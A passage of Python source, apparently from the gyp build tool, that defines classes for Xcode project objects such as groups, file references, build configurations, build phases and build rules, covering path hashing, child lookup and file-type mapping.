(not 'sourceTree' in self._properties or \
self._properties['sourceTree'] == '<group>'):
# If the pathname begins with an Xcode variable like "$(SDKROOT)/", take
# the variable out and make the path be relative to that variable by
# assigning the variable name as the sourceTree.
(source_tree, path) = SourceTreeAndPathFromPath(self._properties['path'])
if source_tree != None:
self._properties['sourceTree'] = source_tree
if path != None:
self._properties['path'] = path
if source_tree != None and path is None and \
not 'name' in self._properties:
# The path was of the form "$(SDKROOT)" with no path following it.
# This object is now relative to that variable, so it has no path
# attribute of its own. It does, however, keep a name.
del self._properties['path']
self._properties['name'] = source_tree
def Name(self):
if 'name' in self._properties:
return self._properties['name']
elif 'path' in self._properties:
return self._properties['path']
else:
# This happens in the case of the root PBXGroup.
return None
def Hashables(self):
"""Custom hashables for XCHierarchicalElements.
XCHierarchicalElements are special. Generally, their hashes shouldn't
change if the paths don't change. The normal XCObject implementation of
Hashables adds a hashable for each object, which means that if
the hierarchical structure changes (possibly due to changes caused when
TakeOverOnlyChild runs and encounters slight changes in the hierarchy),
the hashes will change. For example, if a project file initially contains
a/b/f1 and a/b becomes collapsed into a/b, f1 will have a single parent
a/b. If someone later adds a/f2 to the project file, a/b can no longer be
collapsed, and f1 winds up with parent b and grandparent a. That would
be sufficient to change f1's hash.
To counteract this problem, hashables for all XCHierarchicalElements except
for the main group (which has neither a name nor a path) are taken to be
just the set of path components. Because hashables are inherited from
parents, this provides assurance that a/b/f1 has the same set of hashables
whether its parent is b or a/b.
The main group is a special case. As it is permitted to have no name or
path, it is permitted to use the standard XCObject hash mechanism. This
is not considered a problem because there can be only one main group.
"""
if self == self.PBXProjectAncestor()._properties['mainGroup']:
# super
return XCObject.Hashables(self)
hashables = []
# Put the name in first, ensuring that if TakeOverOnlyChild collapses
# children into a top-level group like "Source", the name always goes
# into the list of hashables without interfering with path components.
if 'name' in self._properties:
# Make it less likely for people to manipulate hashes by following the
# pattern of always pushing an object type value onto the list first.
hashables.append(self.__class__.__name__ + '.name')
hashables.append(self._properties['name'])
# NOTE: This still has the problem that if an absolute path is encountered,
# including paths with a sourceTree, they'll still inherit their parents'
# hashables, even though the paths aren't relative to their parents. This
# is not expected to be much of a problem in practice.
path = self.PathFromSourceTreeAndPath()
if path != None:
components = path.split(posixpath.sep)
for component in components:
hashables.append(self.__class__.__name__ + '.path')
hashables.append(component)
hashables.extend(self._hashables)
return hashables
def Compare(self, other):
# Allow comparison of these types. PBXGroup has the highest sort rank;
# PBXVariantGroup is treated as equal to PBXFileReference.
valid_class_types = {
PBXFileReference: 'file',
PBXGroup: 'group',
PBXVariantGroup: 'file',
}
self_type = valid_class_types[self.__class__]
other_type = valid_class_types[other.__class__]
if self_type == other_type:
# If the two objects are of the same sort rank, compare their names.
return cmp(self.Name(), other.Name())
# Otherwise, sort groups before everything else.
if self_type == 'group':
return -1
return 1
def CompareRootGroup(self, other):
# This function should be used only to compare direct children of the
# containing PBXProject's mainGroup. These groups should appear in the
# listed order.
# TODO(mark): "Build" is used by gyp.generator.xcode, perhaps the
# generator should have a way of influencing this list rather than having
# to hardcode for the generator here.
order = ['Source', 'Intermediates', 'Projects', 'Frameworks', 'Products',
'Build']
# If the groups aren't in the listed order, do a name comparison.
# Otherwise, groups in the listed order should come before those that
# aren't.
self_name = self.Name()
other_name = other.Name()
self_in = isinstance(self, PBXGroup) and self_name in order
other_in = isinstance(self, PBXGroup) and other_name in order
if not self_in and not other_in:
return self.Compare(other)
if self_name in order and not other_name in order:
return -1
if other_name in order and not self_name in order:
return 1
# If both groups are in the listed order, go by the defined order.
self_index = order.index(self_name)
other_index = order.index(other_name)
if self_index < other_index:
return -1
if self_index > other_index:
return 1
return 0
def PathFromSourceTreeAndPath(self):
# Turn the object's sourceTree and path properties into a single flat
# string of a form comparable to the path parameter. If there's a
# sourceTree property other than "<group>", wrap it in $(...) for the
# comparison.
components = []
if self._properties['sourceTree'] != '<group>':
components.append('$(' + self._properties['sourceTree'] + ')')
if 'path' in self._properties:
components.append(self._properties['path'])
if len(components) > 0:
return posixpath.join(*components)
return None
def FullPath(self):
# Returns a full path to self relative to the project file, or relative
# to some other source tree. Start with self, and walk up the chain of
# parents prepending their paths, if any, until no more parents are
# available (project-relative path) or until a path relative to some
# source tree is found.
xche = self
path = None
while isinstance(xche, XCHierarchicalElement) and \
(path is None or \
(not path.startswith('/') and not path.startswith('$'))):
this_path = xche.PathFromSourceTreeAndPath()
if this_path != None and path != None:
path = posixpath.join(this_path, path)
elif this_path != None:
path = this_path
xche = xche.parent
return path
class PBXGroup(XCHierarchicalElement):
"""
Attributes:
_children_by_path: Maps pathnames of children of this PBXGroup to the
actual child XCHierarchicalElement objects.
_variant_children_by_name_and_path: Maps (name, path) tuples of
PBXVariantGroup children to the actual child PBXVariantGroup objects.
"""
_schema = XCHierarchicalElement._schema.copy()
_schema.update({
'children': [1, XCHierarchicalElement, 1, 1, []],
'name': [0, str, 0, 0],
'path': [0, str, 0, 0],
})
def __init__(self, properties=None, id=None, parent=None):
# super
XCHierarchicalElement.__init__(self, properties, id, parent)
self._children_by_path = {}
self._variant_children_by_name_and_path = {}
for child in self._properties.get('children', []):
self._AddChildToDicts(child)
def Hashables(self):
# super
hashables = XCHierarchicalElement.Hashables(self)
# It is not sufficient to just rely on name and parent to build a unique
# hashable : a node could have two child PBXGroup sharing a common name.
# To add entropy the hashable is enhanced with the names of all its
# children.
for child in self._properties.get('children', []):
child_name = child.Name()
if child_name != None:
hashables.append(child_name)
return hashables
def HashablesForChild(self):
# To avoid a circular reference the hashables used to compute a child id do
# not include the child names.
return XCHierarchicalElement.Hashables(self)
def _AddChildToDicts(self, child):
# Sets up this PBXGroup object's dicts to reference the child properly.
child_path = child.PathFromSourceTreeAndPath()
if child_path:
if child_path in self._children_by_path:
raise ValueError('Found multiple children with path ' + child_path)
self._children_by_path[child_path] = child
if isinstance(child, PBXVariantGroup):
child_name = child._properties.get('name', None)
key = (child_name, child_path)
if key in self._variant_children_by_name_and_path:
raise ValueError('Found multiple PBXVariantGroup children with ' + \
'name ' + str(child_name) + ' and path ' + \
str(child_path))
self._variant_children_by_name_and_path[key] = child
def AppendChild(self, child):
# Callers should use this instead of calling
# AppendProperty('children', child) directly because this function
# maintains the group's dicts.
self.AppendProperty('children', child)
self._AddChildToDicts(child)
def GetChildByName(self, name):
# This is not currently optimized with a dict as GetChildByPath is because
# it has few callers. Most callers probably want GetChildByPath. This
# function is only useful to get children that have names but no paths,
# which is rare. The children of the main group ("Source", "Products",
# etc.) is pretty much the only case where this likely to come up.
#
# TODO(mark): Maybe this should raise an error if more than one child is
# present with the same name.
if not 'children' in self._properties:
return None
for child in self._properties['children']:
if child.Name() == name:
return child
return None
def GetChildByPath(self, path):
if not path:
return None
if path in self._children_by_path:
return self._children_by_path[path]
return None
def GetChildByRemoteObject(self, remote_object):
# This method is a little bit esoteric. Given a remote_object, which
# should be a PBXFileReference in another project file, this method will
# return this group's PBXReferenceProxy object serving as a local proxy
# for the remote PBXFileReference.
#
# This function might benefit from a dict optimization as GetChildByPath
# for some workloads, but profiling shows that it's not currently a
# problem.
if not 'children' in self._properties:
return None
for child in self._properties['children']:
if not isinstance(child, PBXReferenceProxy):
continue
container_proxy = child._properties['remoteRef']
if container_proxy._properties['remoteGlobalIDString'] == remote_object:
return child
return None
def AddOrGetFileByPath(self, path, hierarchical):
"""Returns an existing or new file reference corresponding to path.
If hierarchical is True, this method will create or use the necessary
hierarchical group structure corresponding to path. Otherwise, it will
look in and create an item in the current group only.
If an existing matching reference is found, it is returned, otherwise, a
new one will be created, added to the correct group, and returned.
If path identifies a directory by virtue of carrying a trailing slash,
this method returns a PBXFileReference of "folder" type. If path
identifies a variant, by virtue of it identifying a file inside a directory
with an ".lproj" extension, this method returns a PBXVariantGroup
containing the variant named by path, and possibly other variants. For
all other paths, a "normal" PBXFileReference will be returned.
"""
# Adding or getting a directory? Directories end with a trailing slash.
is_dir = False
if path.endswith('/'):
is_dir = True
path = posixpath.normpath(path)
if is_dir:
path = path + '/'
# Adding or getting a variant? Variants are files inside directories
# with an ".lproj" extension. Xcode uses variants for localization. For
# a variant path/to/Language.lproj/MainMenu.nib, put a variant group named
# MainMenu.nib inside path/to, and give it a variant named Language. In
# this example, grandparent would be set to path/to and parent_root would
# be set to Language.
variant_name = None
parent = posixpath.dirname(path)
grandparent = posixpath.dirname(parent)
parent_basename = posixpath.basename(parent)
(parent_root, parent_ext) = posixpath.splitext(parent_basename)
if parent_ext == '.lproj':
variant_name = parent_root
if grandparent == '':
grandparent = None
# Putting a directory inside a variant group is not currently supported.
assert not is_dir or variant_name is None
path_split = path.split(posixpath.sep)
if len(path_split) == 1 or \
((is_dir or variant_name != None) and len(path_split) == 2) or \
not hierarchical:
# The PBXFileReference or PBXVariantGroup will be added to or gotten from
# this PBXGroup, no recursion necessary.
if variant_name is None:
# Add or get a PBXFileReference.
file_ref = self.GetChildByPath(path)
if file_ref != None:
assert file_ref.__class__ == PBXFileReference
else:
file_ref = PBXFileReference({'path': path})
self.AppendChild(file_ref)
else:
# Add or get a PBXVariantGroup. The variant group name is the same
# as the basename (MainMenu.nib in the example above). grandparent
# specifies the path to the variant group itself, and path_split[-2:]
# is the path of the specific variant relative to its group.
variant_group_name = posixpath.basename(path)
variant_group_ref = self.AddOrGetVariantGroupByNameAndPath(
variant_group_name, grandparent)
variant_path = posixpath.sep.join(path_split[-2:])
variant_ref = variant_group_ref.GetChildByPath(variant_path)
if variant_ref != None:
assert variant_ref.__class__ == PBXFileReference
else:
variant_ref = PBXFileReference({'name': variant_name,
'path': variant_path})
variant_group_ref.AppendChild(variant_ref)
# The caller is interested in the variant group, not the specific
# variant file.
file_ref = variant_group_ref
return file_ref
else:
# Hierarchical recursion. Add or get a PBXGroup corresponding to the
# outermost path component, and then recurse into it, chopping off that
# path component.
next_dir = path_split[0]
group_ref = self.GetChildByPath(next_dir)
if group_ref != None:
assert group_ref.__class__ == PBXGroup
else:
group_ref = PBXGroup({'path': next_dir})
self.AppendChild(group_ref)
return group_ref.AddOrGetFileByPath(posixpath.sep.join(path_split[1:]),
hierarchical)
def AddOrGetVariantGroupByNameAndPath(self, name, path):
"""Returns an existing or new PBXVariantGroup for name and path.
If a PBXVariantGroup identified by the name and path arguments is already
present as a child of this object, it is returned. Otherwise, a new
PBXVariantGroup with the correct properties is created, added as a child,
and returned.
This method will generally be called by AddOrGetFileByPath, which knows
when to create a variant group based on the structure of the pathnames
passed to it.
"""
key = (name, path)
if key in self._variant_children_by_name_and_path:
variant_group_ref = self._variant_children_by_name_and_path[key]
assert variant_group_ref.__class__ == PBXVariantGroup
return variant_group_ref
variant_group_properties = {'name': name}
if path != None:
variant_group_properties['path'] = path
variant_group_ref = PBXVariantGroup(variant_group_properties)
self.AppendChild(variant_group_ref)
return variant_group_ref
def TakeOverOnlyChild(self, recurse=False):
"""If this PBXGroup has only one child and it's also a PBXGroup, take
it over by making all of its children this object's children.
This function will continue to take over only children when those children
are groups. If there are three PBXGroups representing a, b, and c, with
c inside b and b inside a, and a and b have no other children, this will
result in a taking over both b and c, forming a PBXGroup for a/b/c.
If recurse is True, this function will recurse into children and ask them
to collapse themselves by taking over only children as well. Assuming
an example hierarchy with files at a/b/c/d1, a/b/c/d2, and a/b/c/d3/e/f
(d1, d2, and f are files, the rest are groups), recursion will result in
a group for a/b/c containing a group for d3/e.
"""
# At this stage, check that child class types are PBXGroup exactly,
# instead of using isinstance. The only subclass of PBXGroup,
# PBXVariantGroup, should not participate in reparenting in the same way:
# reparenting by merging different object types would be wrong.
while len(self._properties['children']) == 1 and \
self._properties['children'][0].__class__ == PBXGroup:
# Loop to take over the innermost only-child group possible.
child = self._properties['children'][0]
# Assume the child's properties, including its children. Save a copy
# of this object's old properties, because they'll still be needed.
# This object retains its existing id and parent attributes.
old_properties = self._properties
self._properties = child._properties
self._children_by_path = child._children_by_path
if not 'sourceTree' in self._properties or \
self._properties['sourceTree'] == '<group>':
# The child was relative to its parent. Fix up the path. Note that
# children with a sourceTree other than "<group>" are not relative to
# their parents, so no path fix-up is needed in that case.
if 'path' in old_properties:
if 'path' in self._properties:
# Both the original parent and child have paths set.
self._properties['path'] = posixpath.join(old_properties['path'],
self._properties['path'])
else:
# Only the original parent has a path, use it.
self._properties['path'] = old_properties['path']
if 'sourceTree' in old_properties:
# The original parent had a sourceTree set, use it.
self._properties['sourceTree'] = old_properties['sourceTree']
# If the original parent had a name set, keep using it. If the original
# parent didn't have a name but the child did, let the child's name
# live on. If the name attribute seems unnecessary now, get rid of it.
if 'name' in old_properties and old_properties['name'] != None and \
old_properties['name'] != self.Name():
self._properties['name'] = old_properties['name']
if 'name' in self._properties and 'path' in self._properties and \
self._properties['name'] == self._properties['path']:
del self._properties['name']
# Notify all children of their new parent.
for child in self._properties['children']:
child.parent = self
# If asked to recurse, recurse.
if recurse:
for child in self._properties['children']:
if child.__class__ == PBXGroup:
child.TakeOverOnlyChild(recurse)
def SortGroup(self):
self._properties['children'] = \
sorted(self._properties['children'], cmp=lambda x,y: x.Compare(y))
# Recurse.
for child in self._properties['children']:
if isinstance(child, PBXGroup):
child.SortGroup()
class XCFileLikeElement(XCHierarchicalElement):
# Abstract base for objects that can be used as the fileRef property of
# PBXBuildFile.
def PathHashables(self):
# A PBXBuildFile that refers to this object will call this method to
# obtain additional hashables specific to this XCFileLikeElement. Don't
# just use this object's hashables, they're not specific and unique enough
# on their own (without access to the parent hashables.) Instead, provide
# hashables that identify this object by path by getting its hashables as
# well as the hashables of ancestor XCHierarchicalElement objects.
hashables = []
xche = self
while xche != None and isinstance(xche, XCHierarchicalElement):
xche_hashables = xche.Hashables()
for index in xrange(0, len(xche_hashables)):
hashables.insert(index, xche_hashables[index])
xche = xche.parent
return hashables
class XCContainerPortal(XCObject):
# Abstract base for objects that can be used as the containerPortal property
# of PBXContainerItemProxy.
pass
class XCRemoteObject(XCObject):
# Abstract base for objects that can be used as the remoteGlobalIDString
# property of PBXContainerItemProxy.
pass
class PBXFileReference(XCFileLikeElement, XCContainerPortal, XCRemoteObject):
_schema = XCFileLikeElement._schema.copy()
_schema.update({
'explicitFileType': [0, str, 0, 0],
'lastKnownFileType': [0, str, 0, 0],
'name': [0, str, 0, 0],
'path': [0, str, 0, 1],
})
# Weird output rules for PBXFileReference.
_should_print_single_line = True
# super
_encode_transforms = XCFileLikeElement._alternate_encode_transforms
def __init__(self, properties=None, id=None, parent=None):
# super
XCFileLikeElement.__init__(self, properties, id, parent)
if 'path' in self._properties and self._properties['path'].endswith('/'):
self._properties['path'] = self._properties['path'][:-1]
is_dir = True
else:
is_dir = False
if 'path' in self._properties and \
not 'lastKnownFileType' in self._properties and \
not 'explicitFileType' in self._properties:
# TODO(mark): This is the replacement for a replacement for a quick hack.
# It is no longer incredibly sucky, but this list needs to be extended.
extension_map = {
'a': 'archive.ar',
'app': 'wrapper.application',
'bdic': 'file',
'bundle': 'wrapper.cfbundle',
'c': 'sourcecode.c.c',
'cc': 'sourcecode.cpp.cpp',
'cpp': 'sourcecode.cpp.cpp',
'css': 'text.css',
'cxx': 'sourcecode.cpp.cpp',
'dart': 'sourcecode',
'dylib': 'compiled.mach-o.dylib',
'framework': 'wrapper.framework',
'gyp': 'sourcecode',
'gypi': 'sourcecode',
'h': 'sourcecode.c.h',
'hxx': 'sourcecode.cpp.h',
'icns': 'image.icns',
'java': 'sourcecode.java',
'js': 'sourcecode.javascript',
'kext': 'wrapper.kext',
'm': 'sourcecode.c.objc',
'mm': 'sourcecode.cpp.objcpp',
'nib': 'wrapper.nib',
'o': 'compiled.mach-o.objfile',
'pdf': 'image.pdf',
'pl': 'text.script.perl',
'plist': 'text.plist.xml',
'pm': 'text.script.perl',
'png': 'image.png',
'py': 'text.script.python',
'r': 'sourcecode.rez',
'rez': 'sourcecode.rez',
's': 'sourcecode.asm',
'storyboard': 'file.storyboard',
'strings': 'text.plist.strings',
'swift': 'sourcecode.swift',
'ttf': 'file',
'xcassets': 'folder.assetcatalog',
'xcconfig': 'text.xcconfig',
'xcdatamodel': 'wrapper.xcdatamodel',
'xcdatamodeld':'wrapper.xcdatamodeld',
'xib': 'file.xib',
'y': 'sourcecode.yacc',
}
prop_map = {
'dart': 'explicitFileType',
'gyp': 'explicitFileType',
'gypi': 'explicitFileType',
}
if is_dir:
file_type = 'folder'
prop_name = 'lastKnownFileType'
else:
basename = posixpath.basename(self._properties['path'])
(root, ext) = posixpath.splitext(basename)
# Check the map using a lowercase extension.
# TODO(mark): Maybe it should try with the original case first and fall
# back to lowercase, in case there are any instances where case
# matters. There currently aren't.
if ext != '':
ext = ext[1:].lower()
# TODO(mark): "text" is the default value, but "file" is appropriate
# for unrecognized files not containing text. Xcode seems to choose
# based on content.
file_type = extension_map.get(ext, 'text')
prop_name = prop_map.get(ext, 'lastKnownFileType')
self._properties[prop_name] = file_type
class PBXVariantGroup(PBXGroup, XCFileLikeElement):
"""PBXVariantGroup is used by Xcode to represent localizations."""
# No additions to the schema relative to PBXGroup.
pass
# PBXReferenceProxy is also an XCFileLikeElement subclass. It is defined below
# because it uses PBXContainerItemProxy, defined below.
class XCBuildConfiguration(XCObject):
_schema = XCObject._schema.copy()
_schema.update({
'baseConfigurationReference': [0, PBXFileReference, 0, 0],
'buildSettings': [0, dict, 0, 1, {}],
'name': [0, str, 0, 1],
})
def HasBuildSetting(self, key):
return key in self._properties['buildSettings']
def GetBuildSetting(self, key):
return self._properties['buildSettings'][key]
def SetBuildSetting(self, key, value):
# TODO(mark): If a list, copy?
self._properties['buildSettings'][key] = value
def AppendBuildSetting(self, key, value):
if not key in self._properties['buildSettings']:
self._properties['buildSettings'][key] = []
self._properties['buildSettings'][key].append(value)
def DelBuildSetting(self, key):
if key in self._properties['buildSettings']:
del self._properties['buildSettings'][key]
def SetBaseConfiguration(self, value):
self._properties['baseConfigurationReference'] = value
class XCConfigurationList(XCObject):
# _configs is the default list of configurations.
_configs = [ XCBuildConfiguration({'name': 'Debug'}),
XCBuildConfiguration({'name': 'Release'}) ]
_schema = XCObject._schema.copy()
_schema.update({
'buildConfigurations': [1, XCBuildConfiguration, 1, 1, _configs],
'defaultConfigurationIsVisible': [0, int, 0, 1, 1],
'defaultConfigurationName': [0, str, 0, 1, 'Release'],
})
def Name(self):
return 'Build configuration list for ' + \
self.parent.__class__.__name__ + ' "' + self.parent.Name() + '"'
def ConfigurationNamed(self, name):
"""Convenience accessor to obtain an XCBuildConfiguration by name."""
for configuration in self._properties['buildConfigurations']:
if configuration._properties['name'] == name:
return configuration
raise KeyError(name)
def DefaultConfiguration(self):
"""Convenience accessor to obtain the default XCBuildConfiguration."""
return self.ConfigurationNamed(self._properties['defaultConfigurationName'])
def HasBuildSetting(self, key):
"""Determines the state of a build setting in all XCBuildConfiguration
child objects.
If all child objects have key in their build settings, and the value is the
same in all child objects, returns 1.
If no child objects have the key in their build settings, returns 0.
If some, but not all, child objects have the key in their build settings,
or if any children have different values for the key, returns -1.
"""
has = None
value = None
for configuration in self._properties['buildConfigurations']:
configuration_has = configuration.HasBuildSetting(key)
if has is None:
has = configuration_has
elif has != configuration_has:
return -1
if configuration_has:
configuration_value = configuration.GetBuildSetting(key)
if value is None:
value = configuration_value
elif value != configuration_value:
return -1
if not has:
return 0
return 1
def GetBuildSetting(self, key):
"""Gets the build setting for key.
All child XCConfiguration objects must have the same value set for the
setting, or a ValueError will be raised.
"""
# TODO(mark): This is wrong for build settings that are lists. The list
# contents should be compared (and a list copy returned?)
value = None
for configuration in self._properties['buildConfigurations']:
configuration_value = configuration.GetBuildSetting(key)
if value is None:
value = configuration_value
else:
if value != configuration_value:
raise ValueError('Variant values for ' + key)
return value
def SetBuildSetting(self, key, value):
"""Sets the build setting for key to value in all child
XCBuildConfiguration objects.
"""
for configuration in self._properties['buildConfigurations']:
configuration.SetBuildSetting(key, value)
def AppendBuildSetting(self, key, value):
"""Appends value to the build setting for key, which is treated as a list,
in all child XCBuildConfiguration objects.
"""
for configuration in self._properties['buildConfigurations']:
configuration.AppendBuildSetting(key, value)
def DelBuildSetting(self, key):
"""Deletes the build setting key from all child XCBuildConfiguration
objects.
"""
for configuration in self._properties['buildConfigurations']:
configuration.DelBuildSetting(key)
def SetBaseConfiguration(self, value):
"""Sets the build configuration in all child XCBuildConfiguration objects.
"""
for configuration in self._properties['buildConfigurations']:
configuration.SetBaseConfiguration(value)
class PBXBuildFile(XCObject):
_schema = XCObject._schema.copy()
_schema.update({
'fileRef': [0, XCFileLikeElement, 0, 1],
'settings': [0, str, 0, 0], # hack, it's a dict
})
# Weird output rules for PBXBuildFile.
_should_print_single_line = True
_encode_transforms = XCObject._alternate_encode_transforms
def Name(self):
# Example: "main.cc in Sources"
return self._properties['fileRef'].Name() + ' in ' + self.parent.Name()
def Hashables(self):
# super
hashables = XCObject.Hashables(self)
# It is not sufficient to just rely on Name() to get the
# XCFileLikeElement's name, because that is not a complete pathname.
# PathHashables returns hashables unique enough that no two
# PBXBuildFiles should wind up with the same set of hashables, unless
# someone adds the same file multiple times to the same target. That
# would be considered invalid anyway.
hashables.extend(self._properties['fileRef'].PathHashables())
return hashables
class XCBuildPhase(XCObject):
"""Abstract base for build phase classes. Not represented in a project
file.
Attributes:
_files_by_path: A dict mapping each path of a child in the files list by
path (keys) to the corresponding PBXBuildFile children (values).
_files_by_xcfilelikeelement: A dict mapping each XCFileLikeElement (keys)
to the corresponding PBXBuildFile children (values).
"""
# TODO(mark): Some build phase types, like PBXShellScriptBuildPhase, don't
# actually have a "files" list. XCBuildPhase should not have "files" but
# another abstract subclass of it should provide this, and concrete build
# phase types that do have "files" lists should be derived from that new
# abstract subclass. XCBuildPhase should only provide buildActionMask and
# runOnlyForDeploymentPostprocessing, and not files or the various
# file-related methods and attributes.
_schema = XCObject._schema.copy()
_schema.update({
'buildActionMask': [0, int, 0, 1, 0x7fffffff],
'files': [1, PBXBuildFile, 1, 1, []],
'runOnlyForDeploymentPostprocessing': [0, int, 0, 1, 0],
})
def __init__(self, properties=None, id=None, parent=None):
# super
XCObject.__init__(self, properties, id, parent)
self._files_by_path = {}
self._files_by_xcfilelikeelement = {}
for pbxbuildfile in self._properties.get('files', []):
self._AddBuildFileToDicts(pbxbuildfile)
def FileGroup(self, path):
# Subclasses must override this by returning a two-element tuple. The
# first item in the tuple should be the PBXGroup to which "path" should be
# added, either as a child or deeper descendant. The second item should
# be a boolean indicating whether files should be added into hierarchical
# groups or one single flat group.
raise NotImplementedError(
self.__class__.__name__ + ' must implement FileGroup')
def _AddPathToDict(self, pbxbuildfile, path):
"""Adds path to the dict tracking paths belonging to this build phase.
If the path is already a member of this build phase, raises an exception.
"""
if path in self._files_by_path:
raise ValueError('Found multiple build files with path ' + path)
self._files_by_path[path] = pbxbuildfile
def _AddBuildFileToDicts(self, pbxbuildfile, path=None):
"""Maintains the _files_by_path and _files_by_xcfilelikeelement dicts.
If path is specified, then it is the path that is being added to the
phase, and pbxbuildfile must contain either a PBXFileReference directly
referencing that path, or it must contain a PBXVariantGroup that itself
contains a PBXFileReference referencing the path.
If path is not specified, either the PBXFileReference's path or the paths
of all children of the PBXVariantGroup are taken as being added to the
phase.
If the path is already present in the phase, raises an exception.
If the PBXFileReference or PBXVariantGroup referenced by pbxbuildfile
are already present in the phase, referenced by a different PBXBuildFile
object, raises an exception. This does not raise an exception when
a PBXFileReference or PBXVariantGroup reappear and are referenced by the
same PBXBuildFile that has already introduced them, because in the case
of PBXVariantGroup objects, they may correspond to multiple paths that are
not all added simultaneously. When this situation occurs, the path needs
to be added to _files_by_path, but nothing needs to change in
_files_by_xcfilelikeelement, and the caller should have avoided adding
the PBXBuildFile if it is already present in the list of children.
"""
xcfilelikeelement = pbxbuildfile._properties['fileRef']
paths = []
if path != None:
# It's best when the caller provides the path.
if isinstance(xcfilelikeelement, PBXVariantGroup):
paths.append(path)
else:
# If the caller didn't provide a path, there can be either multiple
# paths (PBXVariantGroup) or one.
if isinstance(xcfilelikeelement, PBXVariantGroup):
for variant in xcfilelikeelement._properties['children']:
paths.append(variant.FullPath())
else:
paths.append(xcfilelikeelement.FullPath())
# Add the paths first, because if something's going to raise, the
# messages provided by _AddPathToDict are more useful owing to its
# having access to a real pathname and not just an object's Name().
for a_path in paths:
self._AddPathToDict(pbxbuildfile, a_path)
# If another PBXBuildFile references this XCFileLikeElement, there's a
# problem.
if xcfilelikeelement in self._files_by_xcfilelikeelement and \
self._files_by_xcfilelikeelement[xcfilelikeelement] != pbxbuildfile:
raise ValueError('Found multiple build files for ' + \
xcfilelikeelement.Name())
self._files_by_xcfilelikeelement[xcfilelikeelement] = pbxbuildfile
def AppendBuildFile(self, pbxbuildfile, path=None):
# Callers should use this instead of calling
# AppendProperty('files', pbxbuildfile) directly because this function
# maintains the object's dicts. Better yet, callers can just call AddFile
# with a pathname and not worry about building their own PBXBuildFile
# objects.
self.AppendProperty('files', pbxbuildfile)
self._AddBuildFileToDicts(pbxbuildfile, path)
def AddFile(self, path, settings=None):
(file_group, hierarchical) = self.FileGroup(path)
file_ref = file_group.AddOrGetFileByPath(path, hierarchical)
if file_ref in self._files_by_xcfilelikeelement and \
isinstance(file_ref, PBXVariantGroup):
# There's already a PBXBuildFile in this phase corresponding to the
# PBXVariantGroup. path just provides a new variant that belongs to
# the group. Add the path to the dict.
pbxbuildfile = self._files_by_xcfilelikeelement[file_ref]
self._AddBuildFileToDicts(pbxbuildfile, path)
else:
# Add a new PBXBuildFile to get file_ref into the phase.
if settings is None:
pbxbuildfile = PBXBuildFile({'fileRef': file_ref})
else:
pbxbuildfile = PBXBuildFile({'fileRef': file_ref, 'settings': settings})
self.AppendBuildFile(pbxbuildfile, path)
class PBXHeadersBuildPhase(XCBuildPhase):
# No additions to the schema relative to XCBuildPhase.
def Name(self):
return 'Headers'
def FileGroup(self, path):
return self.PBXProjectAncestor().RootGroupForPath(path)
class PBXResourcesBuildPhase(XCBuildPhase):
# No additions to the schema relative to XCBuildPhase.
def Name(self):
return 'Resources'
def FileGroup(self, path):
return self.PBXProjectAncestor().RootGroupForPath(path)
class PBXSourcesBuildPhase(XCBuildPhase):
# No additions to the schema relative to XCBuildPhase.
def Name(self):
return 'Sources'
def FileGroup(self, path):
return self.PBXProjectAncestor().RootGroupForPath(path)
class PBXFrameworksBuildPhase(XCBuildPhase):
# No additions to the schema relative to XCBuildPhase.
def Name(self):
return 'Frameworks'
def FileGroup(self, path):
(root, ext) = posixpath.splitext(path)
if ext != '':
ext = ext[1:].lower()
if ext == 'o':
# .o files are added to Xcode Frameworks phases, but conceptually aren't
# frameworks, they're more like sources or intermediates. Redirect them
# to show up in one of those other groups.
return self.PBXProjectAncestor().RootGroupForPath(path)
else:
return (self.PBXProjectAncestor().FrameworksGroup(), False)
class PBXShellScriptBuildPhase(XCBuildPhase):
_schema = XCBuildPhase._schema.copy()
_schema.update({
'inputPaths': [1, str, 0, 1, []],
'name': [0, str, 0, 0],
'outputPaths': [1, str, 0, 1, []],
'shellPath': [0, str, 0, 1, '/bin/sh'],
'shellScript': [0, str, 0, 1],
'showEnvVarsInLog': [0, int, 0, 0],
})
def Name(self):
if 'name' in self._properties:
return self._properties['name']
return 'ShellScript'
class PBXCopyFilesBuildPhase(XCBuildPhase):
_schema = XCBuildPhase._schema.copy()
_schema.update({
'dstPath': [0, str, 0, 1],
'dstSubfolderSpec': [0, int, 0, 1],
'name': [0, str, 0, 0],
})
# path_tree_re matches "$(DIR)/path" or just "$(DIR)". Match group 1 is
# "DIR", match group 3 is "path" or None.
path_tree_re = re.compile('^\\$\\((.*)\\)(/(.*)|)$')
# path_tree_to_subfolder maps names of Xcode variables to the associated
# dstSubfolderSpec property value used in a PBXCopyFilesBuildPhase object.
path_tree_to_subfolder = {
'BUILT_FRAMEWORKS_DIR': 10, # Frameworks Directory
'BUILT_PRODUCTS_DIR': 16, # Products Directory
# Other types that can be chosen via the Xcode UI.
# TODO(mark): Map Xcode variable names to these.
# : 1, # Wrapper
# : 6, # Executables: 6
# : 7, # Resources
# : 15, # Java Resources
# : 11, # Shared Frameworks
# : 12, # Shared Support
# : 13, # PlugIns
}
def Name(self):
if 'name' in self._properties:
return self._properties['name']
return 'CopyFiles'
def FileGroup(self, path):
return self.PBXProjectAncestor().RootGroupForPath(path)
def SetDestination(self, path):
"""Set the dstSubfolderSpec and dstPath properties from path.
path may be specified in the same notation used for XCHierarchicalElements,
specifically, "$(DIR)/path".
"""
path_tree_match = self.path_tree_re.search(path)
if path_tree_match:
# Everything else needs to be relative to an Xcode variable.
path_tree = path_tree_match.group(1)
relative_path = path_tree_match.group(3)
if path_tree in self.path_tree_to_subfolder:
subfolder = self.path_tree_to_subfolder[path_tree]
if relative_path is None:
relative_path = ''
else:
# The path starts with an unrecognized Xcode variable
# name like $(SRCROOT). Xcode will still handle this
# as an "absolute path" that starts with the variable.
subfolder = 0
relative_path = path
elif path.startswith('/'):
# Special case. Absolute paths are in dstSubfolderSpec 0.
subfolder = 0
relative_path = path[1:]
else:
raise ValueError('Can\'t use path %s in a %s' % \
(path, self.__class__.__name__))
self._properties['dstPath'] = relative_path
self._properties['dstSubfolderSpec'] = subfolder
class PBXBuildRule(XCObject):
_schema = XCObject._schema.copy()
_schema.update({
'compilerSpec': [0, str, 0, 1],
'filePatterns': [0, str, 0, 0],
'fileType': [0, str, 0, 1],
'isEditable': [0, int, 0, 1, 1],
'outputFiles': [1, str, 0, 1, []],
'script': [0, str, 0, 0],
})
def Name(self):
# Not very inspired, but it's what Xcode uses.
return self.__class__.__name__
def Hashables(self):
# super
hashables = XCObject.Hashables(self)
# Use the hashables of the weak objects that this object refers to.
hashables.append(self._properties['fileType'])
if 'filePatterns' in self._properties:
